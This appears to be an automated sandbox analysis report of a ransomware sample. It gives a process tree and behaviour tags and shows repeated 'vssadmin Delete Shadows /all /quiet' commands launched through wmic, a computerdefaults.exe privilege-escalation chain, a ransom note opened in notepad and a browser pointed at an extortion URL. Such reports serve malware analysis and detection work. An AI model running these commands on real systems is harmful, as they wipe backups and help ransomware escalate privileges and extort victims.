PID 4280 wrote to memory of 4812	4280	cmd.exe	118
PID 1080 wrote to memory of 1920	1080	cmd.exe	119
PID 1080 wrote to memory of 1920	1080	cmd.exe	119
PID 1756 wrote to memory of 5224	1756	msedge.exe	128
PID 1756 wrote to memory of 5224	1756	msedge.exe	128
PID 2788 wrote to memory of 5512	2788	cmd.exe	251
PID 2788 wrote to memory of 5512	2788	cmd.exe	251
PID 5280 wrote to memory of 5520	5280	cmd.exe	185
PID 5280 wrote to memory of 5520	5280	cmd.exe	185
PID 4332 wrote to memory of 5528	4332	cmd.exe	135
PID 4332 wrote to memory of 5528	4332	cmd.exe	135
PID 5420 wrote to memory of 5556	5420	cmd.exe	188
PID 5420 wrote to memory of 5556	5420	cmd.exe	188
PID 5520 wrote to memory of 5812	5520	Conhost.exe	198
PID 5520 wrote to memory of 5812	5520	Conhost.exe	198
PID 5512 wrote to memory of 5852	5512	wmic.exe	255
PID 5512 wrote to memory of 5852	5512	wmic.exe	255
PID 5528 wrote to memory of 5880	5528	ComputerDefaults.exe	142
PID 5528 wrote to memory of 5880	5528	ComputerDefaults.exe	142
PID 5556 wrote to memory of 5908	5556	msedge.exe	145
PID 5556 wrote to memory of 5908	5556	msedge.exe	145
PID 1756 wrote to memory of 4268	1756	msedge.exe	155
PID 1756 wrote to memory of 4268	1756	msedge.exe	155
PID 1756 wrote to memory of 4268	1756	msedge.exe	155
PID 1756 wrote to memory of 4268	1756	msedge.exe	155
PID 1756 wrote to memory of 4268	1756	msedge.exe	155
PID 1756 wrote to memory of 4268	1756	msedge.exe	155
PID 1756 wrote to memory of 4268	1756	msedge.exe	155
PID 1756 wrote to memory of 4268	1756	msedge.exe	155
PID 1756 wrote to memory of 4268	1756	msedge.exe	155
PID 1756 wrote to memory of 4268	1756	msedge.exe	155
PID 1756 wrote to memory of 4268	1756	msedge.exe	155
PID 1756 wrote to memory of 4268	1756	msedge.exe	155
PID 1756 wrote to memory of 4268	1756	msedge.exe	155
PID 1756 wrote to memory of 4268	1756	msedge.exe	155
PID 1756 wrote to memory of 4268	1756	msedge.exe	155
PID 1756 wrote to memory of 4268	1756	msedge.exe	155
PID 1756 wrote to memory of 4268	1756	msedge.exe	155
PID 1756 wrote to memory of 4268	1756	msedge.exe	155
PID 1756 wrote to memory of 4268	1756	msedge.exe	155
PID 1756 wrote to memory of 4268	1756	msedge.exe	155

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3972
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:4920
- C:\Windows\System32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1080
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:1920
- C:\Windows\System32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4280
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:4812

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppX53ypgrj20bgndg05hj3tc7z654myszwp.mca
1⤵
PID:3860

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
1⤵
- Checks processor information in registry
- Modifies registry class
PID:4444

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:CortanaUI.AppX3bn25b6f886wmg6twh46972vprk9tnbf.mca
1⤵
PID:4592

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe" -ServerName:InputApp.AppX9jnwykgrccxc8by3hsrsh07r423xzvav.mca
1⤵
- Modifies registry class
PID:3124
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:640
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:220
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:1916
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5664

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Modifies registry class
PID:4644
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  - Checks computer location settings
  PID:4360
- C:\Windows\System32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:4008
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5400
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    - Checks computer location settings
    PID:2476
- C:\Windows\System32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:3844
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:5496

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Modifies registry class
PID:3712
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:5796
- C:\Windows\System32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:1600
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:5456
- C:\Windows\System32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:5736
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:4312

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
PID:4052

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
- Modifies registry class
PID:3908
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:3732
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:5128
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:1392

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3808

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
- Modifies registry class
PID:3584
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:6036
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:2284
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2324
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:6116
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:6032
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:6064

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3428
- C:\Windows\system32\rundll32.exe
  rundll32.exe C:\Users\Admin\AppData\Local\Temp\cbf762fb16cfe0149b46a61f3fb029fd.dll,#1
  2⤵
  - Suspicious use of SetThreadContext
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  PID:4612
- - C:\Windows\system32\cmd.exe
    cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
    3⤵
    PID:1384
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1392
  - - C:\Windows\system32\wbem\WMIC.exe
      C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
      4⤵
      PID:3676
- - C:\Windows\system32\cmd.exe
    cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
    3⤵
    PID:5824
  - - C:\Windows\system32\wbem\WMIC.exe
      C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
      4⤵
      PID:2672
- - C:\Windows\system32\wbem\wmic.exe
    C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:844
- C:\Windows\notepad.exe
  notepad.exe C:\Users\Public\readme.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:2072
- C:\Windows\system32\cmd.exe
  cmd /c "start http://4604a6b87eac8a3024awbcrke.hegame.xyz/awbcrke^&2^&45052174^&73^&343^&2219041"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:916
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://4604a6b87eac8a3024awbcrke.hegame.xyz/awbcrke&2&45052174&73&343&2219041
    3⤵
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory
    PID:1756
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff9962646f8,0x7ff996264708,0x7ff996264718
      4⤵
      PID:5224
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2164,15513739986232414868,10975623828323482571,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2156 /prefetch:2
      4⤵
      PID:4268
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2164,15513739986232414868,10975623828323482571,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2352 /prefetch:3
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:1824
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2164,15513739986232414868,10975623828323482571,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2836 /prefetch:8
      4⤵
      PID:5516
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,15513739986232414868,10975623828323482571,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3508 /prefetch:1
      4⤵
      PID:5840
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,15513739986232414868,10975623828323482571,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3528 /prefetch:1
      4⤵
      PID:5512
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,15513739986232414868,10975623828323482571,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4792 /prefetch:1
      4⤵
      PID:4360
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,15513739986232414868,10975623828323482571,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3092 /prefetch:1
      4⤵
      PID:5924
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,15513739986232414868,10975623828323482571,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4804 /prefetch:1
      4⤵
      Suspicious use of WriteProcessMemory
      PID:5556
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,15513739986232414868,10975623828323482571,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4908 /prefetch:1
      4⤵
      PID:5196
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,15513739986232414868,10975623828323482571,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3856 /prefetch:1
      4⤵
      PID:284
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,15513739986232414868,10975623828323482571,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3840 /prefetch:1
      4⤵
      PID:5140
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2164,15513739986232414868,10975623828323482571,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1944 /prefetch:8
      4⤵
      PID:4192
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2164,15513739986232414868,10975623828323482571,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1944 /prefetch:8
      4⤵
      PID:4344
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,15513739986232414868,10975623828323482571,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2524 /prefetch:1
      4⤵
      PID:444
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,15513739986232414868,10975623828323482571,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1864 /prefetch:1
      4⤵
      PID:5792
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2164,15513739986232414868,10975623828323482571,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5492 /prefetch:2
      4⤵
      PID:5272
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2292
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:60
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:2408
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1976
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:4476

C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
PID:2928
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:6012
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:5944
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:292
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:3400
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:2324

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
- Modifies registry class
PID:2792
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:5332
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:5232
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:4572
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:5424
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:5184

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
- Modifies registry class
PID:2760
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:5292
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:1080
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:5332
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:5900
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:3188

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Modifies registry class
PID:4640
- C:\Windows\System32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:3140
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:5564
- C:\Windows\System32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:5812
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:640
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:284

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2788
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:5512
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:5852

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:4252

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4332
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5528
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:5880

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5156

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:5280
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:5520
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:5812

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:5420
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:5556
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:5908

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:5440

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2664

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:4636

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:4312

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:3348

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2936

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:3732
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4636
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:5244

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:536
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:1016
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:5128

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:4952
- C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5520

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5692

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:1000

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:5140
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:5160
- - C:\Windows\system32\wbem\wmic.exe
